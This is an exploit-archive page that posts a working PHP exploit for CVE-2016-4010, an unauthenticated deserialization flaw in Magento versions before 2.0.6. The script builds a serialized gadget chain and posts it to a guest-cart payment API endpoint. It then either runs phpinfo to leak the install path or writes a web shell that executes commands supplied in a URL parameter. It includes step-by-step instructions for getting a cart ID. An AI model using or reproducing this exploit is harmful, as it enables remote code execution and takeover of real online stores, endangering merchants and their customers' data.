exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Magento Unauthenticated Arbitrary File Write

Magento Unauthenticated Arbitrary File Write
Posted May 18, 2016
Authored by agix

Magento versions prior to 2.0.6 suffer from an unauthenticated arbitrary unserialize to arbitrary write file vulnerability.

tags | exploit, arbitrary
advisories | CVE-2016-4010
SHA-256 | aabdfe5b303d6f19ce1fc498c50679f141c6beebfcd6c15c192c8f28b94a86a8

Magento Unauthenticated Arbitrary File Write

Change Mirror Download
<?php

// Exploit Title: [CVE-2016-4010] Magento unauthenticated arbitrary unserialize -> arbitrary write file
// Date: 18/05/206
// Exploit Author: agix (discovered by NETANEL RUBIN)
// Vendor Homepage: https://magento.com
// Version: < 2.0.6
// CVE : CVE-2016-4010

// to get a valid guestCartId
// * add an item in your cart
// * go to checkout
// * fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts/<guestCartId>/shipping-information
// (* in the response check the payment method it may vary from checkmo)
//
// If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.


class Magento_Framework_Simplexml_Config_Cache_File extends DataObject
{
function __construct($data){
$this->_data = $data;
}
}

class Credis_Client{
const TYPE_STRING = 'string';
const TYPE_LIST = 'list';
const TYPE_SET = 'set';
const TYPE_ZSET = 'zset';
const TYPE_HASH = 'hash';
const TYPE_NONE = 'none';
const FREAD_BLOCK_SIZE = 8192;

/**
* Socket connection to the Redis server or Redis library instance
* @var resource|Redis
*/
protected $redis;
protected $redisMulti;

/**
* Host of the Redis server
* @var string
*/
protected $host;

/**
* Port on which the Redis server is running
* @var integer
*/
protected $port;

/**
* Timeout for connecting to Redis server
* @var float
*/
protected $timeout;

/**
* Timeout for reading response from Redis server
* @var float
*/
protected $readTimeout;

/**
* Unique identifier for persistent connections
* @var string
*/
protected $persistent;

/**
* @var bool
*/
protected $closeOnDestruct = TRUE;

/**
* @var bool
*/
protected $connected = TRUE;

/**
* @var bool
*/
protected $standalone;

/**
* @var int
*/
protected $maxConnectRetries = 0;

/**
* @var int
*/
protected $connectFailures = 0;

/**
* @var bool
*/
protected $usePipeline = FALSE;

/**
* @var array
*/
protected $commandNames;

/**
* @var string
*/
protected $commands;

/**
* @var bool
*/
protected $isMulti = FALSE;

/**
* @var bool
*/
protected $isWatching = FALSE;

/**
* @var string
*/
protected $authPassword;

/**
* @var int
*/
protected $selectedDb = 0;

/**
* Aliases for backwards compatibility with phpredis
* @var array
*/
protected $wrapperMethods = array('delete' => 'del', 'getkeys' => 'keys', 'sremove' => 'srem');

/**
* @var array
*/
protected $renamedCommands;

/**
* @var int
*/
protected $requests = 0;


public function __construct($resource) {
$this->redis = new Magento_Sales_Model_Order_Payment_Transaction($resource);
}
}

class DataObject
{
/**
* Object attributes
*
* @var array
*/
protected $_data = [];

/**
* Setter/Getter underscore transformation cache
*
* @var array
*/
protected static $_underscoreCache = [];
}

abstract class AbstractModel2 extends DataObject
{
/**
* Prefix of model events names
*
* @var string
*/
protected $_eventPrefix = 'core_abstract';

/**
* Parameter name in event
*
* In observe method you can use $observer->getEvent()->getObject() in this case
*
* @var string
*/
protected $_eventObject = 'object';

/**
* Name of object id field
*
* @var string
*/
protected $_idFieldName = 'id';

/**
* Data changes flag (true after setData|unsetData call)
* @var $_hasDataChange bool
*/
protected $_hasDataChanges = false;

/**
* Original data that was loaded
*
* @var array
*/
protected $_origData;

/**
* Object delete flag
*
* @var bool
*/
protected $_isDeleted = false;

/**
* Resource model instance
*
* @var \Magento\Framework\Model\ResourceModel\Db\AbstractDb
*/
protected $_resource;

/**
* Resource collection
*
* @var \Magento\Framework\Model\ResourceModel\Db\Collection\AbstractCollection
*/
protected $_resourceCollection;

/**
* Name of the resource model
*
* @var string
*/
protected $_resourceName;

/**
* Name of the resource collection model
*
* @var string
*/
protected $_collectionName;

/**
* Model cache tag for clear cache in after save and after delete
*
* When you use true - all cache will be clean
*
* @var string|array|bool
*/
protected $_cacheTag = false;

/**
* Flag which can stop data saving after before save
* Can be used for next sequence: we check data in _beforeSave, if data are
* not valid - we can set this flag to false value and save process will be stopped
*
* @var bool
*/
protected $_dataSaveAllowed = true;

/**
* Flag which allow detect object state: is it new object (without id) or existing one (with id)
*
* @var bool
*/
protected $_isObjectNew = null;

/**
* Validator for checking the model state before saving it
*
* @var \Zend_Validate_Interface|bool|null
*/
protected $_validatorBeforeSave = null;

/**
* Application Event Dispatcher
*
* @var \Magento\Framework\Event\ManagerInterface
*/
protected $_eventManager;

/**
* Application Cache Manager
*
* @var \Magento\Framework\App\CacheInterface
*/
protected $_cacheManager;

/**
* @var \Magento\Framework\Registry
*/
protected $_registry;

/**
* @var \Psr\Log\LoggerInterface
*/
protected $_logger;

/**
* @var \Magento\Framework\App\State
*/
protected $_appState;

/**
* @var \Magento\Framework\Model\ActionValidator\RemoveAction
*/
protected $_actionValidator;

/**
* Array to store object's original data
*
* @var array
*/
protected $storedData = [];
}

abstract class AbstractExtensibleModel extends AbstractModel2
{
protected $extensionAttributesFactory;

/**
* @var \Magento\Framework\Api\ExtensionAttributesInterface
*/
protected $extensionAttributes;

/**
* @var AttributeValueFactory
*/
protected $customAttributeFactory;

/**
* @var string[]
*/
protected $customAttributesCodes = null;

/**
* @var bool
*/
protected $customAttributesChanged = false;

}

abstract class AbstractModel extends AbstractExtensibleModel
{
}

class Magento_Sales_Model_Order_Payment_Transaction extends AbstractModel
{
/**#@+
* Supported transaction types
* @var string
*/
const TYPE_PAYMENT = 'payment';

const TYPE_ORDER = 'order';

const TYPE_AUTH = 'authorization';

const TYPE_CAPTURE = 'capture';

const TYPE_VOID = 'void';

const TYPE_REFUND = 'refund';

/**#@-*/

/**
* Raw details key in additional info
*/
const RAW_DETAILS = 'raw_details_info';

/**
* Order instance
*
* @var \Magento\Sales\Model\Order\Payment
*/
protected $_order = null;

/**
* Parent transaction instance
* @var \Magento\Sales\Model\Order\Payment\Transaction
*/
protected $_parentTransaction = null;

/**
* Child transactions, assoc array of transaction_id => instance
*
* @var array
*/
protected $_children = null;

/**
* Child transactions, assoc array of txn_id => instance
* Filled only in case when all child transactions have txn_id
* Used for quicker search of child transactions using isset() as opposite to foreaching $_children
*
* @var array
*/
protected $_identifiedChildren = null;

/**
* Whether to perform automatic actions on transactions, such as auto-closing and putting as a parent
*
* @var bool
*/
protected $_transactionsAutoLinking = true;

/**
* Whether to throw exceptions on different operations
*
* @var bool
*/
protected $_isFailsafe = true;

/**
* Whether transaction has children
*
* @var bool
*/
protected $_hasChild = null;

/**
* Event object prefix
*
* @var string
* @see \Magento\Framework\Model\AbstractModel::$_eventPrefix
*/
protected $_eventPrefix = 'sales_order_payment_transaction';

/**
* Event object prefix
*
* @var string
* @see \Magento\Framework\Model\AbstractModel::$_eventObject
*/
protected $_eventObject = 'order_payment_transaction';

/**
* Order website id
*
* @var int
*/
protected $_orderWebsiteId = null;

/**
* @var \Magento\Sales\Model\OrderFactory
*/
protected $_orderFactory;

/**
* @var \Magento\Framework\Stdlib\DateTime\DateTimeFactory
*/
protected $_dateFactory;

/**
* @var TransactionFactory
*/
protected $_transactionFactory;

/**
* @var \Magento\Sales\Api\OrderPaymentRepositoryInterface
*/
protected $orderPaymentRepository;

/**
* @var \Magento\Sales\Api\OrderRepositoryInterface
*/
protected $orderRepository;

/**
* @param \Magento\Framework\Model\Context $context
* @param \Magento\Framework\Registry $registry
* @param \Magento\Framework\Api\ExtensionAttributesFactory $extensionFactory
* @param AttributeValueFactory $customAttributeFactory
* @param \Magento\Sales\Model\OrderFactory $orderFactory
* @param \Magento\Framework\Stdlib\DateTime\DateTimeFactory $dateFactory
* @param TransactionFactory $transactionFactory
* @param \Magento\Framework\Model\ResourceModel\AbstractResource $resource
* @param \Magento\Framework\Data\Collection\AbstractDb $resourceCollection
* @param array $data
* @SuppressWarnings(PHPMD.ExcessiveParameterList)
*/
public function __construct($resource) {
$this->_resource = $resource;
}
}

class Magento_Framework_DB_Transaction{
protected $_objects = [];

/**
* Transaction objects array with alias key
*
* @var array
*/
protected $_objectsByAlias = [];

/**
* Callbacks array.
*
* @var array
*/
protected $_beforeCommitCallbacks = ["phpinfo"];
}

if(count($argv) < 3){
echo 'Usage: '.$argv[0].' <magento_uri> <guestCartId> (whereToWrite)'.chr(0x0a);
echo 'To get a valid guestCartId'.chr(0x0a);
echo '* add an item in your cart'.chr(0x0a);
echo '* go to checkout'.chr(0x0a);
echo '* fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts/<guestCartId>/shipping-information'.chr(0x0a);
echo '(* in the response check the payment method it may vary from "checkmo")'.chr(0x0a).chr(0x0a);
echo 'If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.'.chr(0x0a);
exit();
}

if(count($argv) === 4){
$data = [];
$data['is_allowed_to_save'] = True;
$data['stat_file_name'] = $argv[3];
$data['components'] = '<?php system($_GET[0]); ?>';
$resource = new Magento_Framework_Simplexml_Config_Cache_File($data);
}
else{
$resource = new Magento_Framework_DB_Transaction();
}

$redis = new Credis_Client($resource);
$serialized = serialize($redis);

$payload = json_decode('{"paymentMethod":{"method":"checkmo", "additional_data":{"additional_information":""}}, "email": "valid@magento.com"}');

$payload->paymentMethod->additional_data->additional_information = str_replace('Magento_Framework_DB_Transaction', 'Magento\\Framework\\DB\\Transaction', str_replace('Magento_Sales_Model_Order_Payment_Transaction', 'Magento\\Sales\\Model\\Order\\Payment\\Transaction', str_replace('Magento_Framework_Simplexml_Config_Cache_File', 'Magento\\Framework\\Simplexml\\Config\\Cache\\File', $serialized)));

for($i=0; $i<2; $i++){
$c = curl_init($argv[1].'/rest/V1/guest-carts/'.$argv[2].'/set-payment-information');
curl_setopt($c, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
curl_setopt($c, CURLOPT_POSTFIELDS, json_encode($payload));
curl_exec($c);
curl_close($c);
}

?>

Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    66 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close